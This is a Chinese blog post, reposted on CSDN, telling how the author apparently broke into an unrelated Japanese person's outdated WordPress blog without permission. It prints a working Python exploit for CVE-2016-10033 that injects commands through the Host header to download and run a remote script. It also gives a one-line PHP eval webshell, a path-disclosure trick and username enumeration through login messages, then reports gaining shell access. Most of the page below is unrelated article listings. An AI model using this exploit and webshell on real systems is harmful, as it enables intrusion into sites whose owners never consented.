对日本某Wordpress博客站的一次渗透测试

最新推荐文章于 2023-05-03 10:57:20 发布
最新推荐文章于 2023-05-03 10:57:20 发布
阅读量673 收藏 6
点赞数 2
分类专栏: 渗透测试 文章标签: 渗透测试
原文链接:https://mp.weixin.qq.com/s/i0rPIPVVuQ0Cky5DuOLhTw
版权
博主通过扫描发现一个使用旧版Wordpress的博客站点,利用4.6版本的任意命令执行漏洞(CVE-2016-10033),构造exploit执行命令,成功在目标网站上部署WebShell并取得访问权限。此过程展示了渗透测试的基本步骤和技术,提醒网站管理员及时更新系统以避免安全风险。
摘要由CSDN通过智能技术生成

阅读本文大概需要 2.3 分钟

今天,又是忙碌且充实的一天。

下班回到家的我,又在用 FOFA 扫网站,然后便扫到一个日本网友的博客站点。这界面风格,一看就是 Wordpress 了,网站底部也可以看到 Wordpress 的字样。

只有寥寥无几的博文,并且最近一条还是在 3 年前。

我浏览器装了 Wappalyzer 插件,插件显示了如下信息。

4.5.3 ?这是好久以前的版本了,看来博主确实很久没打理这个网站了。

不过看到这个版本号,我顿时来了精神了。因为我想起 Wordpress <= 4.6 有个经典的任意命令执行漏洞(CVE-2016-10033)。

立马找到我以前写的笔记,一顿翻找,不一会儿就找到了曾经用过的一个 exp。

#!/usr/bin/env python3
import requests
import sys

# wordpress's url
target = 'http://127.0.0.1' if len(sys.argv) < 1 else sys.argv[1]
# Put your command in a website, and use the website's url
# don't contains "http://", must be all lowercase
shell_url = 'example.com/1.txt' if len(sys.argv) < 2 else sys.argv[2]
# an exists user
user = 'admin'

def generate_command(command):
    command = '${run{%s}}' % command
    command = command.replace('/', '${substr{0}{1}{$spool_directory}}')
    command = command.replace(' ', '${substr{10}{1}{$tod_log}}')
    return 'target(any -froot@localhost -be %s null)' % command


session = requests.session()
data = {
    'user_login': user,
    'redirect_to': '',
    'wp-submit': 'Get New Password'
}
session.headers = {
    'Host': generate_command('/usr/bin/curl -o/tmp/rce ' + shell_url),
    'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
}
session.allow_redirects = False
target += '/wp-login.php?action=lostpassword'
session.post(target, data=data)

session.headers['Host'] = generate_command('/bin/bash /tmp/rce')
session.post(target, data=data)

简单讲一下上面的代码。

target 是目标网站,shell_url 则是要执行的命令文件的地址,并且这个地址必须是目标网站所在的机器可以访问到的,user 则是当前网站存在的用户名。

target 目前已知,那么我还需要构造 shell_url,并且需要得到一个有效用户名。

首先来构造 shell_url

创建 1.txt,写入如下的命令,该命令会在指定目录写入一句话木马。

echo '<?php @eval($_POST["cmd"]);?>' > /var/www/html/1.php

上面的命令指定将木马 1.php 写到 /var/www/html/ 下。而我现在要将木马写到网站根目录,但是我并不确定网站根目录是否为 /var/www/html/。

这时想起之前看到 Wordpress 有绝对路径泄露漏洞,访问 /wp-admin/admin-functions.php,显示如下。

当前网站根目录确实是在 /var/www/html/。

1.txt 放到本地服务器,再使用内网穿透,将本地服务器映射到公网,使得目标机器可以访问到。

输入公网地址访问测试,成功访问。

接下来获取网站用户名

网站域名是 mxxxxblog.com,所以猜测用户名为 mxxxx,进入登录页面进行测试。

用户名输入 mxxxxx,密码随便,提示密码错误。

随便输一个用户名。

提示用户名不存在。(看不懂日语,翻译的)

至此得到用户名。

修改 exp

将 target、构造的 shell_url 和得到的用户名替换到 exp 中,最终 exp 如下。

执行 exp

直接 python 执行,没有任何输出。猜测应该是执行成功了。

直接使用蚁剑连接,成功连接。

至此已经拿到 WebShell,不打算再往下了。

结语

其实这次渗透并不算难,基本就是一个 RCE 利用。主要还是目标网站所使用的的系统太老了。

在这里我想对大家说,有些事情其实没你想的那么难。你可以觉得难,但千万不要因为难就不去做,不愿意尝试。

希望大家共勉,加油!

三分灰
关注
专栏目录
wordpress博客搭建-保姆教程
自由人
11-29 467
前言: 如今这个年代,估计每个人都有属于自己的服务器,放着也是放着,为什么不用来搭建一个博客呢。 Wordpress作为目前流行的动态博客,至今已经发展了数十年,用wordpress简直是不能太简单。 准备工具: 一台服务器 一个域名 Wordpress安装包 教程: 服务器购买: 本教程才使用的是Vultr的服务 打开购买地址:购买服务器 选择高频服务,地区选择东京(看...
wordpress-exploit-framework:一个旨在帮助WordPress系统进行渗透测试的Ruby框架
02-05
WordPress漏洞利用框架 一个旨在帮助WordPress系统进行渗透测试的Ruby框架。 安装 要安装最新的稳定版本,请运行gem install wpxf 。 安装后,您可以通过运行wpxf启动WordPress Exploit Framework控制台。 我需要运行什么? 要运行WordPress Exploit Framework,需要Ruby> = 2.4.4。 安装疑难解答 Debian系统 如果您在安装WPXF的依赖项时遇到问题(特别是Nokogiri),请首先确保您具有编译C扩展所需的所有工具: sudo apt-get install build-essentia
WPCracker:WordPress 渗透测试工具
05-29
WP破解器 适用于 Windows 和 Linux 的 WordPress 用户枚举和登录 Brute Force 工具 使用“蛮力”工具,您可以控制要执行的攻击的攻击程度,这会影响所需的攻击时间。 该工具可以调整线程数量以及每次测试每个线程的密码批次大小。 但是,过多的攻击力会导致受害者的服务器变慢。 例如,当我攻击我的本地服务器时,当我使用程序预设的线程数(12)和批处理大小(1000)时,大约需要两天时间才能通过rockyou.txt(14,341,564个唯一密码) )。 在本文中,“受害者”是指 pentest 实验室中被攻击的 WordPress 点。 攻击您无权访问的 WordPress 点可能是非法的。 使用: 用户枚举 . \W PCracker.exe --enum -u < Url> -o < Output
Wordpress渗透测试(进阶详细思路)
weixin_51957047的博客
05-26 7044
web渗透测试wordpress渗透测试思路
WordPress进行渗透测试 – 详解
zhalang8324的博客
01-13 5259
WordPress是一个专注于PHP和MySQL的免费在线开源内容托管系统。这是一个功能强大且使用最多的博客工具。 由于WordPress使用过程中出现了太多的错误,所以需要提高安全性。WordPress渗透测试对于发现漏洞并保护您的WordPress博客非常重要。 安全研究人员丹尼尔·西德说,在2016年,至少有15769个甚至更多的WordPress已经被入侵。 根据Su
干货 | Wordpress渗透方法指南
leah126的博客
05-03 2606
如果您遇到使用 WordPress 的网,您会怎么做,渗透思路和安全检测思路?
Kali linux 渗透测试技术之搭建WordPress Turnkey Linux及检测WordPress 应用程序漏洞
freeking101的博客
06-30 5032
From:https://bbs.ichunqiu.com/thread-15716-1-1.html 怎样用 WPScan,Nmap 和 Nikto 扫描和检查一个 WordPress 点的安全性:https://www.cnblogs.com/chayidiansec/p/7989274.html 为了收集用于测试的应用程序, Turnkey Linux是一个非常好的资源。 ...
WordPress插件给博客加上live2d伊斯特瓦尔源码资源下载整理.zip
最新发布
08-20
本资源包"WordPress插件给博客加上live2d伊斯特瓦尔源码资源下载整理.zip"正是针对这一需求,提供了将Live2D技术集成到WordPress博客的方法。Live2D是一种二维动态渲染技术,它能够使静态的二次元角色变得生动起来,...
日语考试通 日语考试通(日本语能力测试) v2.5
10-27
日语学习软件(日语考试通)重点针对日语等级考试 、出国留学、日语能力提升人群的需要,而设计的日语辅助学习软件,同步较新日本语能力测试考试大纲,软件中包含了 “日本语能力
Don:基于沙盒的 wordpress 主题 Don(一种来自日本的食物名称)
06-28
"唐(丼)"是一个专为WordPress设计的独特主题,它的命名来源于日本传统的一类食物——丼(Don)。这个主题的设计理念是简洁与实用,它建立在另一个广为人知的主题框架——沙盒(Sandbox)之上。 沙盒主题是WordPress...
用wpscan进行wordpress渗透测试
D-R0s1的博客
01-25 3581
一、wpscan的介绍         这是一款Wordpress的专用扫描器,Wordpress作为三大建模板之一,在全世界范围内有大量的用户,这也导致白帽子都会去跟踪wordpress的安全漏洞,Wordpress自诞生起也出现了很多漏洞。Wordpress还可以使用插件、主题。于是Wordpress本身很难挖掘什么安全问题的时候,安全研究者开始研究其插件、主题的漏洞。通过插件、主题的漏洞...
python渗透测试入门之wordpress登录
ailx10
06-13 667
近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第14个实验(密码猜测),我的测试环境是mbp电脑+同事的wordpress点+conda开发环境。有一说一,弱口令是脆弱的,但是复杂密码根本猜不出来,需要分析点POST请求和响应是值得肯定的,但是等着耗着CPU和网络是不可取的~1、查阅wordpress点登录页面源代码首先GET请求,接受返回...
【CyberSecurityLearning 71】DC系列之DC-2渗透测试WordPress
_Co1a
04-18 829
目录 DC-2靶机渗透测试 一、实验环境 二、实验要求 三、渗透过程演示 flag1: flag2: flag3: flag4: final-flag: DC-2靶机渗透测试 一、实验环境 实验环境: kali2021:192.168.3.151/24(桥接到vmnet0) 靶机环境DC-2(桥接到vmnet0,MAC地址:00:0C:29:3F:B7:2B) 保证kali和DC-2在同一个网段 二、实验要求 靶机中一共有五个flag文件,我们需要找到它们,即可完成任务.
【CyberSecurityLearning 75】DC系列之DC-6渗透测试WordPress
_Co1a
05-09 431
DC-6靶机渗透测试 0x00实验环境 靶机:DC-6,MAC地址:00:0C:29:85:9D:FD(192.168.3.190) 测试机:Kali,IP地址:192.168.3.188 1、信息收集 1.1 发现DC-6的IP地址 利用DC-6的MAC地址找到IP 命令:nmap -sP 192.168.3.1/24 -oN nmap.sP 发现DC-6的IP为192.168.3.190 1.2 扫描开放端口 nmap -A 192.168.3.190 -p 1-65535 -o
如何渗透测试WordPress
kuxing100的专栏
07-26 3227
原文:http://www.freebuf.com/articles/web/5264.html 前言 英语水平有限,许多地方翻译的不是很通顺,请各位海涵。初见该文章便对文章作者很是佩服,因为在文章中详细的讲述了每一个步骤,这对于初学者来说尤为难得。所以决定将该文章翻译出来,供大家借鉴学习。 正文 原文题目:How Hackers Target and Hack Your Site
网络渗透测试博客作业
m0_62826547的博客
12-13 334
1.zoomeye摄像头 很多摄像头厂商存在口令机制的漏洞,比如设置了默认的账号密码,用户在使用的时候可能没有对此进行更改。某摄像头厂商的管理系统的http-banner为DVRDVS-Webs.使用zoomeye对其进行搜索可以得到很多的结果,对其地址进行访问 进入登陆页面输入默认账户:admin 密码:12345 进入页面后需要下载插件观看 下载完成打开文件进行安装 之后重新打开Internet Explorer在设置中找到更改兼容性视图添加此网 ...
Vulnhub靶场渗透测试系列DC-6(WordPress的activity monitor插件漏洞)
qq_45722813的博客
12-07 807
Vulnhub靶场渗透测试系列DC-6 下载地址:https://www.vulnhub.com/entry/dc-6,315/ 将下载好的靶机导入到VMware中,修改网络模式为NAT模式,开启靶机虚拟机 在kali机使用命令nmap -Pn 192.168.172.1/24主机发现,获取靶机IP地址 ...
搭建WordPress渗透测试靶机
D-R0s1的博客
01-24 3455
        想要提高自己在实战中渗透的技术,就要在靶机中不断地训练,今天和大家一起搭建一个WordPress的渗透环境,文章很基础,希望可以帮到像我一样的技术小白。 第一步:         我们需要在https://www.turnkeylinux.org/wordpress中下载镜像,因为网是全英文的,所以在这里我给大家附上几张图,大家根据图示就可以轻松的找到下载的地方。 ...
JASPAR规范:ECU渗透测试指南(1.0版)
随着车辆网络通信的发展,尤其是在联网和自动驾驶汽车中,ECUs承担着关键的功能,并且由于对安全性的高要求,它们成为了渗透测试的重点目标。这些设备原本可能看似无需信息安全措施,但在当前高度互联的汽车环境中,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值